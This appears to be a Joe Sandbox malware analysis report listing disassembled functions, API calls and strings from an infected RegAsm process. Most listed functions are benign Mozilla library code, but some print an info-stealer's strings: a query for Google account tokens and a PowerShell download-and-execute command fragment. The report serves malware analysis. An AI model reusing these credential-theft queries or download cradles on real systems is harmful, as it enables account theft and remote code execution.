Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 00409B1F
AccountId, xrefs: 00409BC9
GoogleAccounts, xrefs: 00409A8E
GoogleAccounts, xrefs: 00409A37

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$lstrcat$AllocLocal
String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
API String ID: 3306365304-1713091031
Opcode ID: 23a8635a48a7421f52fb52e76b1e4f954d6a09d0e6bce8243b1f57598da2cf87
Instruction ID: bcd8a3c27cc20b2b0202687c0b5b9a5b34e989406908c304105e5c1fc2b99bb7
Opcode Fuzzy Hash: 23a8635a48a7421f52fb52e76b1e4f954d6a09d0e6bce8243b1f57598da2cf87
Instruction Fuzzy Hash: 45815171E40109ABCF01FFA5DE469DD77B5AF04309F511026F900B71E2DBB8AE898B99

Function 6C561220 Relevance: 12.2, APIs: 8, Instructions: 173threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C56124B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C561268
GetCurrentThreadId.KERNEL32 ref: 6C5612DA
InitializeConditionVariable.KERNEL32(?), ref: 6C56134A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C56138A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C561431

Part of subcall function 6C558AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C571563), ref: 6C558BD5

free.MOZGLUE(?), ref: 6C56145A
free.MOZGLUE(?), ref: 6C56146C

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: 58895729c163865faef0e7a59a494e887d3eb740bb20e19e2256d0f3e6958fa6
Instruction ID: 4865dc8b7dc04196417959cd8cec03c4802bfe998bac174fc0a3a9491ba48c95
Opcode Fuzzy Hash: 58895729c163865faef0e7a59a494e887d3eb740bb20e19e2256d0f3e6958fa6
Instruction Fuzzy Hash: 5F618C75604340DBDB10DF26CC807AAB7F5BFC5308F05991DE98A57A21EB71E859CB42

Function 6C560F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C560F6B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C560F88
GetCurrentThreadId.KERNEL32 ref: 6C560FF7
InitializeConditionVariable.KERNEL32(?), ref: 6C561067
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C5610A7
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C56114B

Part of subcall function 6C558AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C571563), ref: 6C558BD5

free.MOZGLUE(?), ref: 6C561174
free.MOZGLUE(?), ref: 6C561186

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: 8f914549239c1e5383c8f4280b683f1d39944995b7be251702b67d8dde272459
Instruction ID: fd3dbec577af9e6e5736f37e3fd0e99dd87e7f1e2416e6dff1423b1de065a137
Opcode Fuzzy Hash: 8f914549239c1e5383c8f4280b683f1d39944995b7be251702b67d8dde272459
Instruction Fuzzy Hash: FE618C75A043409BDB10DF26CC807AAB7F5BFC5308F05991DE88957B21EB71E949CB86

Function 6C51E9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,6C521999), ref: 6C51EA39
memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6C51EA5C
memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6C51EA76
moz_xmalloc.MOZGLUE(-00000001,?,?,6C521999), ref: 6C51EA9D
memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6C521999), ref: 6C51EAC2
memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6C51EADC
free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6C51EB0B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6C51EB27

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 706364981-0
Opcode ID: 304f1155bf46fcc825f969f187a3b5d3a69c26b97d82dac0688e00a09337257d
Instruction ID: b6302e0c3a6bec4d168dc1d0122a26eedd4ed989f5a7510fe2edadefe7e05f4e
Opcode Fuzzy Hash: 304f1155bf46fcc825f969f187a3b5d3a69c26b97d82dac0688e00a09337257d
Instruction Fuzzy Hash: 2C41B1B1A042159FEB14CF68DC88AAE77E4FF45364F240628E815E7F94E770EA0487E1

Function 6C51B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6C51B61E,?,?,?,?,?,00000000), ref: 6C51B6AC

Part of subcall function 6C52CA10: malloc.MOZGLUE(?), ref: 6C52CA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C51B61E,?,?,?,?,?,00000000), ref: 6C51B6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C51B61E,?,?,?,?,?,00000000), ref: 6C51B6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C51B61E,?,?,?,?,?,00000000), ref: 6C51B70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C51B61E,?,?,?,?,?,00000000), ref: 6C51B71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C51B61E), ref: 6C51B73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6C51B61E,?,?,?,?,?,00000000), ref: 6C51B760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C51B61E,?,?,?,?,?,00000000), ref: 6C51B79A

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: cee30a98c831d579cb6fdd9c63d18d299cefd41020b29222a6ef3994ed1d277e
Instruction ID: 1028b0c62f87d12d023fc4e0a17fc0cfeedeae5ca2b8de22e26a61cc6194d2ed
Opcode Fuzzy Hash: cee30a98c831d579cb6fdd9c63d18d299cefd41020b29222a6ef3994ed1d277e
Instruction Fuzzy Hash: 0B41D4F2D041158FDB00EF68DC845AEB7B9FB94324F250669E825E7B80E731AD0487D1

Function 6C51EF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(6C595104), ref: 6C51EFAC
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C51EFD7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C51EFEC
free.MOZGLUE(?), ref: 6C51F00C
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C51F02E
memcpy.VCRUNTIME140(00000000,?), ref: 6C51F041
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C51F065
moz_xmalloc.MOZGLUE ref: 6C51F072

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 1148890222-0
Opcode ID: 03a47dd6c51a8b580b7b37e3c92667890009ea5646991cf34e12b11deff90044
Instruction ID: dc07a30155efe762a3ebde2649016fe5e91b76c01b1316026bcc3faa9db50152
Opcode Fuzzy Hash: 03a47dd6c51a8b580b7b37e3c92667890009ea5646991cf34e12b11deff90044
Instruction Fuzzy Hash: 344116B1A042119FDB08CF68DC849AE7365EF84324B240728E916DBB94FB71ED15C7E1

Function 6C58B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C58B5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C58B5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C58B5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C58B5F4
__Init_thread_footer.LIBCMT ref: 6C58B605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C58B61F
std::_Facet_Register.LIBCPMT ref: 6C58B631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C58B655

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 359b76666d468defea636f96d894e7ea50dba3d03a0463e4d8b13fdbd5ef417a
Instruction ID: 710dd9c4acdec19071bdc70c108e6e96c0ed54441d95f26d1d14c9caa7ceb831
Opcode Fuzzy Hash: 359b76666d468defea636f96d894e7ea50dba3d03a0463e4d8b13fdbd5ef417a
Instruction Fuzzy Hash: 0531B571B00254CBCF10EF69CC949AEB7B9FF85324B170599E90297790DB70AD06CB95

Function 6C556590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C54FA80: GetCurrentThreadId.KERNEL32 ref: 6C54FA8D
Part of subcall function 6C54FA80: AcquireSRWLockExclusive.KERNEL32(6C59F448), ref: 6C54FA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C556727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C5567C8

Part of subcall function 6C564290: memcpy.VCRUNTIME140(?,?,6C572003,6C570AD9,?,6C570AD9,00000000,?,6C570AD9,?,00000004,?,6C571A62,?,6C572003,?), ref: 6C5642C4

Strings

data, xrefs: 6C556593
vYl, xrefs: 6C55696C

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data$vYl
API String ID: 511789754-2113430109
Opcode ID: dcaaccdc62bad27255b427d99c819be050edb17cdc548a38c7b559f141c3d6ee
Instruction ID: 67e8f460018246bbc117e0c798df6af6cc44fd3d303438cb618f85511476021a
Opcode Fuzzy Hash: dcaaccdc62bad27255b427d99c819be050edb17cdc548a38c7b559f141c3d6ee
Instruction Fuzzy Hash: E5D19A75A05380CFD724DF25CC50B9EB7E5AFC5308F50892EE48A87B91EB30A959CB52

Function 6C54D5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C51EB57,?,?,?,?,?,?,?,?,?), ref: 6C54D652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C51EB57,?), ref: 6C54D660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C51EB57,?), ref: 6C54D673
free.MOZGLUE(?), ref: 6C54D888

Strings

|Enabled, xrefs: 6C54D81E
WQl, xrefs: 6C54D5D9, 6C54D63F

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: WQl$|Enabled
API String ID: 4142949111-2775750137
Opcode ID: baa0ebd41658ed21e320ce503f88c4a2caff366bb0fb0984d0c8b18b5617bad1
Instruction ID: a9b7b8491d0e518eb1f886250062f40f7b0afbde53f2867fb0560ed97110d5b5
Opcode Fuzzy Hash: baa0ebd41658ed21e320ce503f88c4a2caff366bb0fb0984d0c8b18b5617bad1
Instruction Fuzzy Hash: 72A1E370A04358CFDB11CF69CC907AEBBF1AF49318F14855CD889AB781D735A945CBA1

Function 6C529830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6C577ABE), ref: 6C52985B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C577ABE), ref: 6C5298A8
moz_xmalloc.MOZGLUE(00000020), ref: 6C529909
memcpy.VCRUNTIME140(00000023,?,?), ref: 6C529918
free.MOZGLUE(?), ref: 6C529975

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
String ID:
API String ID: 1281542009-0
Opcode ID: 04f4cd16416dff35392ca51b082004e06772f0e1ff883db36421056df913574d
Instruction ID: c47c5b706f9bee0810a50b21d88ea8ab5a9adf97cb93e235f40676bd3b0f8e29
Opcode Fuzzy Hash: 04f4cd16416dff35392ca51b082004e06772f0e1ff883db36421056df913574d
Instruction Fuzzy Hash: 9D7199B56007058FC725CF28C880956B7F1FF8A324B644AADE85A8BBA0D775F845CB91

Function 6C52B790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C56CC83,?,?,?,?,?,?,?,?,?,6C56BCAE,?,?,6C55DC2C), ref: 6C52B7E6
?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C56CC83,?,?,?,?,?,?,?,?,?,6C56BCAE,?,?,6C55DC2C), ref: 6C52B80C
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C56CC83,?,?,?,?,?,?,?,?,?,6C56BCAE), ref: 6C52B88E
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C56CC83,?,?,?,?,?,?,?,?,?,6C56BCAE,?,?,6C55DC2C), ref: 6C52B896

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
String ID:
API String ID: 922945588-0
Opcode ID: eb141c5b2f98b5fb33ad4c015602b615ad60d1b81402d3a5fa71d3276bc6c234
Instruction ID: 0467d960c80bba8f644896ead4347bfc03d002843c9209ced614e0c15c38c7cd
Opcode Fuzzy Hash: eb141c5b2f98b5fb33ad4c015602b615ad60d1b81402d3a5fa71d3276bc6c234
Instruction Fuzzy Hash: A9519F357006008FDB24EF59C884A2AB7F5FF89318B5A895DE99B97792C735EC01CB84

Function 6C554AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C554AB7,?,6C5143CF,?,6C5142D2), ref: 6C554B48
free.MOZGLUE(?,?,?,80000000,?,6C554AB7,?,6C5143CF,?,6C5142D2), ref: 6C554B7F
memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C554AB7,?,6C5143CF,?,6C5142D2), ref: 6C554B94
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C554AB7,?,6C5143CF,?,6C5142D2), ref: 6C554BBC
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6C554AB7,?,6C5143CF,?,6C5142D2), ref: 6C554BEE

Strings

pid:, xrefs: 6C554BE8

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
String ID: pid:
API String ID: 1916652239-3403741246
Opcode ID: 9ea1e32c97ad23ea295a5e744a230b626557cf885cc95f6df1c7e8545cca6aa1
Instruction ID: e172e0e8c6995188435660ccd2d49642e2d03f52b0ff95a0cdf9adbf1f70fb23
Opcode Fuzzy Hash: 9ea1e32c97ad23ea295a5e744a230b626557cf885cc95f6df1c7e8545cca6aa1
Instruction Fuzzy Hash: 2A411671B002559BCF14CFB8DC8099FBBF9AF85234B544639E869D7781DB30A928C7A1

Function 00412D70 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

ShellExecuteEx.SHELL32(?), ref: 00412EC0

Strings

.ps1, xrefs: 00412DF3
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412E18
C:\ProgramData\, xrefs: 00412DA3
')", xrefs: 00412E13
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412E5B

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 2215929589-1989157005
Opcode ID: a3660bf6eb38366a5fc88e1f2295be1a68adea8c2c4e3bb7b595f6666764ac78
Instruction ID: d4bc49303887be4e6334ac6b4843b1e71d055e880c24203978c9a7e3e1ca0007
Opcode Fuzzy Hash: a3660bf6eb38366a5fc88e1f2295be1a68adea8c2c4e3bb7b595f6666764ac78
Instruction Fuzzy Hash: 4641FB71E00119ABCF11FBA6DD469CDB7B4AF04308F61406BF514B7191DBB86E8A8B98

Function 6C561D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C561D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C561BE3,?,?,6C561D96,00000000), ref: 6C561D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C561BE3,?,?,6C561D96,00000000), ref: 6C561D4C
GetCurrentThreadId.KERNEL32 ref: 6C561DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C561DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C561DDA

Part of subcall function 6C561EF0: GetCurrentThreadId.KERNEL32 ref: 6C561F03
Part of subcall function 6C561EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C561DF2,00000000,00000000), ref: 6C561F0C
Part of subcall function 6C561EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C561F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C561DF4

